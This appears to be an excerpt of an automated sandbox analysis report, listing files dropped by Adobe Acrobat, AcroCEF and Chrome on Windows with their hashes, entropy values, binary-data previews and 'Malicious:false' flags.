                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):782
                                                                    Entropy (8bit):5.366176540542007
                                                                    Encrypted:false
                                                                    SSDEEP:12:YvXKXm2Jt73+WRuUhU1caYGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uk:Yv6Xm29U1ca+168CgEXX5kcIfANhfq
                                                                    MD5:79C57898E789C78B17CCA022DFA74AC6
                                                                    SHA1:143C41E58E1ECD1DD8874EBA40A08E0417DC24A2
                                                                    SHA-256:7F38C0DFCDFAC13EBA88DF84FF9471BCC8D2C9638ECFFD272CC6FD9F994AD714
                                                                    SHA-512:B23105A707246D43CEEA3C0DF87DB07C280BB0F6617661198516EF349DCCDAE5E827020CDEAA13D3DBD0FD8D24D9DBE44015D4F6958139386F2796781A63D9A8
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"0cc44c54-dc72-42d8-bfe0-c20bd3a2b808","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1716698096269,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1716519716303}}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):0.8112781244591328
                                                                    Encrypted:false
                                                                    SSDEEP:3:e:e
                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                    Malicious:false
                                                                    Preview:....
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):2814
                                                                    Entropy (8bit):5.13780781667639
                                                                    Encrypted:false
                                                                    SSDEEP:24:YUcyCmS54bXhPwqAio4amHayaEP5jOj0SzZmCTQ2h2LSqXsLT5bQ9buuwvOG:YWfSuXhPbEEFwfEMU8LTq9b8b
                                                                    MD5:3CBC83D7E9DB1D097687054ED195952F
                                                                    SHA1:8A50AD9A1F5FE11093BEF5F17128062CE253811A
                                                                    SHA-256:B679A6B6FD8178806EC6A81F30349198691E81CE7322178DAFF7DD3EA341C453
                                                                    SHA-512:D842BBA1A7FAF982E5B6280999E7A6495B529E9392C2878630D4F9A6AF938A3E375E9DDE882DCF1D6ABF37C4D08E788E607BAF6E72D2CD44C92067CB71635B85
                                                                    Malicious:false
                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"163482250952c1feeb27e5faf94ab492","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1716519715000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"2aaec22724a92fb000c97eafd8e66c50","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1716519715000},{"id":"Edit_InApp_Aug2020","info":{"dg":"991ea44237a63f60f96b7c93f487d168","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1716519715000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"4bda6be2b654c05f6a7ff8900f3ef54c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1716519715000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"25d6a7625591281b825181a1e24b3868","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1716519715000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"437e5317a0bcac2027d02dabf92b9f40","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1716519715000},
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                    Category:dropped
                                                                    Size (bytes):12288
                                                                    Entropy (8bit):0.9861335258097041
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QeXIcLESiAievF:TVl2GL7ms67YXtr4cI85
                                                                    MD5:8A61AD02A202831C99CEBB82137A58E7
                                                                    SHA1:C4F05E7823FAACCBA2D454C1B67D44835D87B38E
                                                                    SHA-256:4CA4FB1EF8BD191296C0B245F46D079A263D22FC9251A3EA9477900F5118D164
                                                                    SHA-512:A58237DF93797417C0211C7A7A81A3AA3C3AC59A4CB91AD8C3FA7DB5996E708D40716FA7D8C30AE6F30C724B4126CCF42B34AAEFF65138C4160DE89CCC3B7098
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite Rollback Journal
                                                                    Category:dropped
                                                                    Size (bytes):8720
                                                                    Entropy (8bit):1.3432623183303312
                                                                    Encrypted:false
                                                                    SSDEEP:24:7+tYASY9QmQ6QeX7cLESiAi0mY9QdqLBx/XYKQvGJF7ursP:7MYlYXtrLcI8KYoqll2GL7msP
                                                                    MD5:06A6B103CAFC31B22D3D0DEED8412B8A
                                                                    SHA1:3F4FEE026609385C4EA905FDB92F1EC468A24B5F
                                                                    SHA-256:CEF6E42BEF0BE71BBBE228B79CF95091652D255F7A7A960D504544536ED40486
                                                                    SHA-512:97477D3403F1B254862DA55DE1784284D156AB4E38F4125DD1D26F9C933AB038B9E93344D99AB70A96CEC1D8802BF8E9DA0F4B40DA76226840E7B1A53DFC80DD
                                                                    Malicious:false
                                                                    Preview:.... .c..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):246
                                                                    Entropy (8bit):3.5213298467083405
                                                                    Encrypted:false
                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rDlt:Qw946cPbiOxDlbYnuRKmv
                                                                    MD5:D452337BA0855A68523D0480DFD9BAEF
                                                                    SHA1:D1A22C0C52A28860A4A0F25449B8194DE157C43C
                                                                    SHA-256:C751B07781F9E4278E5F2B85555E4513D150EB3B0A2B04E6B1160A3F49415742
                                                                    SHA-512:D90F534004E0B2A6E2390A5EE4FC5A20132D2AC4585C9BFF78D526FABEC37AC7700CB3238EB2280087EF1545BEC2681F62CF4434D765FCB26004CC31AFC7E4DC
                                                                    Malicious:false
                                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.0.5./.2.0.2.4. . .2.3.:.0.1.:.5.7. .=.=.=.....
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393)
                                                                    Category:dropped
                                                                    Size (bytes):16525
                                                                    Entropy (8bit):5.353642815103214
                                                                    Encrypted:false
                                                                    SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                                    MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                    SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                    SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                    SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                    Malicious:false
                                                                    Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):15092
                                                                    Entropy (8bit):5.3327302481219085
                                                                    Encrypted:false
                                                                    SSDEEP:384:1qAf1TcnHUdXM1UjOJpIh/UxFODzaa+pA3z1/DlpNZOZXyAbzgdy1W3+zT59dKqx:8eI
                                                                    MD5:0E9B021433B5E5BE4F16612BB792D355
                                                                    SHA1:2AFC1488811732C0306B45F06E309A5C3B2AFAAE
                                                                    SHA-256:198096ABAB34514001E6635122B8CC757572E7F3B86E7ED289C80BCBEB8874C4
                                                                    SHA-512:8AD332C8167183763F84E14BA5754CD6946885C08CF4D6697CA7132BB4B736CD594F15FE9E346B295CA2009CA5A040624E13420795D7BC33189283ABAF873CCC
                                                                    Malicious:false
                                                                    Preview:SessionID=4a2ad085-4359-4baa-b236-286be10d3414.1716519712150 Timestamp=2024-05-23T23:01:52:150-0400 ThreadID=828 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=4a2ad085-4359-4baa-b236-286be10d3414.1716519712150 Timestamp=2024-05-23T23:01:52:152-0400 ThreadID=828 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=4a2ad085-4359-4baa-b236-286be10d3414.1716519712150 Timestamp=2024-05-23T23:01:52:152-0400 ThreadID=828 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=4a2ad085-4359-4baa-b236-286be10d3414.1716519712150 Timestamp=2024-05-23T23:01:52:152-0400 ThreadID=828 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=4a2ad085-4359-4baa-b236-286be10d3414.1716519712150 Timestamp=2024-05-23T23:01:52:153-0400 ThreadID=828 Component=ngl-lib_NglAppLib Description="SetConfig: N
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):29752
                                                                    Entropy (8bit):5.417314901245182
                                                                    Encrypted:false
                                                                    SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcblcbiIcqcbB:fhWlA/TV/cR
                                                                    MD5:D76E3B3140C3E4EFC8E0E5E993453E4B
                                                                    SHA1:456C3BAF1BF796B8DD1AC4D995B69018566D0D1D
                                                                    SHA-256:6EFD85CCB48E3F9ACC727DC39DA52B4D282FB007766EF40ED8879AAD6B301E4B
                                                                    SHA-512:EFB02288D4DBE0D6FCFE915B89C4EC2889F7BF540DA518A2EC0AE0A6692F67674C0FA122652E9842B3D0466634104621E87930B193379F4CA53886A852876B1D
                                                                    Malicious:false
                                                                    Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                    Category:dropped
                                                                    Size (bytes):758601
                                                                    Entropy (8bit):7.98639316555857
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                    MD5:3A49135134665364308390AC398006F1
                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                    Malicious:false
                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                    Category:dropped
                                                                    Size (bytes):386528
                                                                    Entropy (8bit):7.9736851559892425
                                                                    Encrypted:false
                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                    Malicious:false
                                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                    Category:dropped
                                                                    Size (bytes):1419751
                                                                    Entropy (8bit):7.976496077007677
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/yOWL07oXGZBZwYIGNPldpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:HWLxXGZBZwZGP3mlind9i4ufFXpAXkrj
                                                                    MD5:8AA8FD12F2DF58393AA972746390B798
                                                                    SHA1:83B44322BDF84EBA9BDBD30521D10EF176CAC5C3
                                                                    SHA-256:24A572549BC1325A849F40E6D945D0E30452F0E533693818543A83E4E7E28842
                                                                    SHA-512:DFCFB1934107067180114E0A5254F581BDBF670FBADE13B9A1917AF0A8075C9A53BEBAE821D2603870CDA972AECFF80BDF46FB592E8385CCC2E69A3415B06E5C
                                                                    Malicious:false
                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                    Category:dropped
                                                                    Size (bytes):1407294
                                                                    Entropy (8bit):7.97605879016224
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                    MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                    SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                    SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                    SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                    Malicious:false
                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 24 02:01:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2673
                                                                    Entropy (8bit):3.9888186908524226
                                                                    Encrypted:false
                                                                    SSDEEP:48:8IdFTNloHVidAKZdA1FehwiZUklqehqy+3:8S/O9y
                                                                    MD5:8ADC1726C5C5BD027833C6B711D4AD9E
                                                                    SHA1:ACA8F809A02F00CABE8328B5A16319CE3176F28E
                                                                    SHA-256:D624005E9336DC0F52B4DD852D0DE9F34DDEC2E37256B4E0DE2395954F57D6E6
                                                                    SHA-512:6F0101F05496A0D1A85375A8E942FFCB110EF7D2617C6AE73AEA6699D1EE9C59FC4C3F6C6DA4802B4D05F5A32D1BA344891EC41A368547470E4471EC5C41F43F
                                                                    Malicious:false
                                                                    Preview:L..................F.@.. ...$+.,....!.I.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X*.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X;............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1.d......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri May 24 02:01:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2675
                                                                    Entropy (8bit):4.003645433607408
                                                                    Encrypted:false
                                                                    SSDEEP:48:8idFTNloHVidAKZdA1seh/iZUkAQkqehty+2:8Q/o9QAy
                                                                    MD5:3622CE477772324A8CCDAA611EC3D1EA
                                                                    SHA1:837ED33ABCE2293707C014CD938E0C449C1E5F3A
                                                                    SHA-256:11E46637F8A26C478BE252424F3BCD0877D9BA09A673F718BD931F02A2B8C457
                                                                    SHA-512:67EB912CFB189C4D7C52CF8A79DBC5663B126ECC50934897605754613DA1647C5A0890476B2D5BBE11356EFE8CA312747E7A55E465F978858BD0183916A63A9E
                                                                    Malicious:false
                                                                    Preview:L..................F.@.. ...$+.,......=.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X*.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X;............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1.d......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2689
                                                                    Entropy (8bit):4.010162883893493
                                                                    Encrypted:false
                                                                    SSDEEP:48:8idFTNlAHVidAKZdA14meh7sFiZUkmgqeh7s7y+BX:8Q/MnBy
                                                                    MD5:473BF3FDE7DAB81BE522F3E979ADC13E
                                                                    SHA1:682FCCDAE917E02FAFF05536CC47880B6791701C
                                                                    SHA-256:2B0A1CD8317C49B88BFE9C45702987FE21348CB68AAFCB28758ABED50F833B6E
                                                                    SHA-512:8F8D6E5FD668176E7D716585ECD1F96A07840226EB4583B2432FCCB0BB735D15D4831C067C1BBF42B5A5FB257C491EF16DAC39187BD243AFFE7F33C84359BD5D
                                                                    Malicious:false
